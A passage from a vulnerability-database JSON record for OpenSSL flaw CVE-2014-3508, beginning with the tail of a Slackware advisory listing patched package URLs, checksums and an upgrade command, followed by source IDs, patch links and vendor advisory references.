-current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz\n3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz\n075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz\n92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\ndf5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz\n582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz\nb80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz\n0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\nd1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz\nec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz\n25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz\n4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nf2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz\n4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz\n27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz\n\nSlackware x86_64 -current packages:\n8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz\nfd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address", "sources": [ { "db": "NVD", "id": "CVE-2014-3508" }, { "db": "BID", "id": "69075" }, { "db": "VULMON", "id": "CVE-2014-3508" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "132467" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "128131" }, { "db": "PACKETSTORM", "id": "127811" } ], "trust": 1.98 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3508", "trust": 2.2 }, { "db": "BID", "id": "69075", "trust": 1.4 }, { "db": "SECUNIA", "id": "59700", "trust": 1.1 }, { "db": "SECUNIA", "id": "61100", "trust": 1.1 }, { "db": "SECUNIA", "id": "60803", "trust": 1.1 }, { "db": "SECUNIA", "id": "59710", "trust": 1.1 }, { "db": "SECUNIA", "id": "60410", "trust": 1.1 }, { "db": "SECUNIA", "id": "61214", "trust": 1.1 }, { "db": "SECUNIA", "id": "60917", "trust": 1.1 }, { "db": "SECUNIA", "id": "61017", "trust": 1.1 }, { "db": "SECUNIA", "id": "59221", "trust": 1.1 }, { "db": "SECUNIA", "id": "60921", "trust": 1.1 }, { "db": "SECUNIA", "id": "60221", "trust": 1.1 }, { "db": "SECUNIA", "id": "60022", "trust": 1.1 }, { "db": "SECUNIA", "id": "60824", "trust": 1.1 }, { "db": "SECUNIA", "id": "60938", "trust": 1.1 }, { "db": "SECUNIA", "id": "59743", "trust": 1.1 }, { "db": "SECUNIA", "id": "61250", "trust": 1.1 }, { "db": "SECUNIA", "id": "59756", "trust": 1.1 }, { "db": "SECUNIA", "id": "61959", "trust": 1.1 }, { "db": "SECUNIA", "id": "60861", "trust": 1.1 }, { "db": "SECUNIA", "id": "58962", "trust": 1.1 }, { "db": "SECUNIA", "id": "61171", "trust": 1.1 }, { "db": "SECUNIA", "id": "61775", "trust": 1.1 }, { "db": "SECUNIA", "id": "60778", "trust": 1.1 }, { "db": "SECUNIA", "id": "60684", "trust": 1.1 }, { "db": "SECUNIA", "id": "61184", "trust": 1.1 }, { "db": "SECUNIA", "id": "60687", "trust": 1.1 }, { "db": "SECUNIA", "id": "61392", "trust": 1.1 }, { "db": "SECUNIA", "id": "60493", "trust": 1.1 }, { "db": "SECTRACK", "id": "1030693", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2014-06", "trust": 1.1 }, { "db": "VULMON", "id": "CVE-2014-3508", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130815", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128248", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132467", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128387", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127790", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137201", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128131", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127811", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3508" }, { "db": "BID", "id": "69075" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "132467" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "128131" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "NVD", "id": "CVE-2014-3508" } ] }, "id": "VAR-201408-0090", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.42424244 }, "last_update_date": "2024-06-17T08:53:04.393000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2308-1" }, { "title": "Debian Security Advisories: DSA-2998-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=bfd576c692d8814b2a331baf29ad367c" }, { "title": "Amazon Linux AMI: ALAS-2014-391", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-391" }, { "title": "Symantec Security Advisories: SA85 : OpenSSL Security Advisory 06-Aug-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=02a206cf2efb06aecdaf29aeca851b55" }, { "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc" }, { "title": "BinSeeker", "trust": 0.1, "url": "https://github.com/buptssegj/binseeker " }, { "title": "oval", "trust": 0.1, "url": "https://github.com/jumanjihouse/oval " }, { "title": "wormhole", "trust": 0.1, "url": "https://github.com/jumanjihouse/wormhole " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3508" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3508" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "https://www.openssl.org/news/secadv_20140806.txt" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2014-1256.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "trust": 1.4, "url": "https://support.citrix.com/article/ctx216642" }, { "trust": 1.4, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:18.openssl.asc" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2014-1297.html" }, { "trust": 1.1, "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-008.txt.asc" }, { "trust": 1.1, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-1052.html" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-1053.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-08/msg00036.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140853041709441\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140973896703549\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141077370928502\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142495837901899\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142624590206005\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142791032306609\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143290437727362\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143290522027658\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58962" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59221" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59700" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59710" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59743" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59756" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60022" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60221" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60410" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60493" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60684" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60687" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60778" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60803" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60824" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60861" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60917" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60921" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60938" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61017" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61100" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61171" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61184" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61214" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61250" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61392" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61775" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61959" }, { "trust": 1.1, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15571.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2014/dsa-2998" }, { "trust": 1.1, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-372998.htm" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:158" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69075" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1030693" }, { "trust": 1.1, "url": "http://www.tenable.com/security/tns-2014-06" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681752" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 1.1, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_3508_information_disclosure" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1127490" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/95165" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05150888" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05158380" }, { "trust": 1.1, "url": "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-september/000196.html" }, { "trust": 1.0, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=0042fb5fd1c9d257d713b15a1f45da05cf5c1c87" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 0.4, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.4, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.4, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3505" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3510" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3506" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682663" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021317" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_wan_boot" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004917" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21681752" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004931" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004872" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691210" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04574073" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/mar/84" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/151" }, { "trust": 0.3, "url": "aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100182969" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04424322" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04624296" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04426586" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04404655" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684570" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2b8d8-513128526dd97/cert_security_mini-_bulletin_xrx15m_for_wc75xx_v1_1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2deee-50da9c14daae3/cert_mini_security_bulletin_xrx15a_v1-01.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685467" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097658" }, { "trust": 0.3, "url": "https://bto.bluecoat.com/security-advisory/sa85" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100182784" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-1052.html" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-1054.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684913" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691005" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097903" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098264" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098252" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098585" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21689886" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686182" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685967" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096510" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687099" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685043" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15571.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966557" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3507" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_" }, { "trust": 0.2, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3512" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/200.html" }, { "trust": 0.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=0042fb5fd1c9d257d713b15a1f45da05cf5c1c87" }, { "trust": 0.1, "url": "https://www.rapid7.com/db/vulnerabilities/ibm-aix-cve-2014-3508" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://github.com/buptssegj/binseeker" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2308-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=35202" }, { "trust": 0.1, "url": "http://h71000.www7.hp.com/openvms/products/ssl/ssl.html" }, { "trust": 0.1, "url": "http://h20565.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04486577-1" }, { "trust": 0.1, "url": "https://technet.microsoft.com/library/security/3009008" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3508.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3510.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3505.html" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3506.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.17" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.5" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2308-1" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1790" }, { "trust": 0.1, "url": "http://www.hpe.com/info/insightmanagement" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2019" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1788" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1792" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131085" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2020" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2018" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1789" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2022" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1791" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2017" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7501" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2027" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6565" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2026" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2021" }, { "trust": 0.1, "url": "https://h20564.www2.h" }, { "trust": 0.1, "url": "http://www.hp.com/jp/icewall/_patchaccess" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3508" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3511" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3512" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3505" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5139" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3508" }, { "db": "BID", "id": "69075" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "132467" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "128131" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "NVD", "id": "CVE-2014-3508" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3508" }, { "db": "BID", "id": "69075" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "132467" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "128131" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "NVD", "id": "CVE-2014-3508" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": 